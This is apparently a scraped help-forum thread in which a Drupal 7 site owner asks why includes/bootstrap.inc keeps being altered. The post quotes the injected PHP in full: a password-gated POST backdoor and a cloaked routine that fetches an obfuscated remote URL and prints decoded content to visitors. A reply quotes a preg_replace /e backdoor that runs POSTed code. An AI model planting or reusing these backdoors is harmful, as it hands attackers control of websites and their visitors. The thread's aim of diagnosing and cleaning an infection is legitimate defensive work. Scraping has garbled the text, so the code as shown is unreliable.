drupal - includes/bootstrap.inc hacked/changed constantly -
my hosting provider warned me bootstrap.inc file connecting infected host. issue meant happening between 771 , 808 line of includes/bootstrap.inc file (code below).
this file somehow changed (once week), 120kb 123kbs. wherever happens, try upload clean file. if file changed/hacked, hosting response longer 10-15 seconds.
the drupal 7 updated 7.41, modules date. code that's causing issue, somewhere between lines (i suspect "cookie" part). infected/added part hosting provider warned me about:
$_passssword = '2505363ea355401256fe974720d85db8'; $p = $_post; if (@$p[$_passssword] , @$p['a'] , @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], ''); if (!empty($_get['check']) , $_get['check'] == $_passssword) { echo('<!--checker_start '); $tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css'); echo(substr($tmp, 50)); echo(' checker_end-->'); } unset($_passssword); $bad_url = false; foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') $regex) { if (preg_match($regex, $_server['request_uri'])) { $bad_url = true; break; } } $cookie_name = 'php_session_php'; if (!$bad_url , !isset($_cookie[$cookie_name]) , empty($echo_done) , !empty($_server['http_user_agent']) , (substr(trim($_server['remote_addr']), 0, 6) != '74.125') , !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_server['http_user_agent'])) { // setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/'); // $url = base64_decode('a3d3czkslda2lts0ltuwltoxlgfvbgqspgjvc2tijxz3blxwbhzxygy+ndmwmdc5ndsymjcyoti6mje='); $url = decrypt_url('a3d3czkslda2lts0ltuwltoxlgfvbgqspgjvc2tijxz3blxwbhzxygy+ndmwmdc5ndsymjcyoti6mje='); $code = request_url_data($url); // if (!empty($code) , base64_decode($code) , preg_match('#[a-za-z0-9+/]+={0,3}#is', $code, $m)) { if (($code = request_url_data($url)) , $decoded = base64_decode($code, true)) { $echo_done = true; print $decoded; } }//iend
i'm no back-end developer , i've been using bootstrap hobby related-project on 8 years.
i tried clean d7 (reuploaded fresh includes, modules , apart /sites/). tried check on popular scanners.
does have idea, how block changes bootstrap.inc? there successful tools that, or modules scanning? or maybe recognizes exploit , give me tip coming from?
thank in advance.
i had same hack on drupal site. code put in bootstrap.inc file looked identical yours.
apart of changes bootstrap.inc hackers installed multiple backdoors in various modules. able find backdoors using hacked module, allows find modified files.
the backdoors in drupal looked similar code:
<?php @preg_replace('/(.*)/e', @$_post['ttqdgkkfkolmt'], '');
this code uses vulnerability in preg_replace, allows attackers execute random php code using simple http post request. (the preg_replace vulnerably resolved in php version > 5.5)
hope helped. luck finding backdoors!
Comments
Post a Comment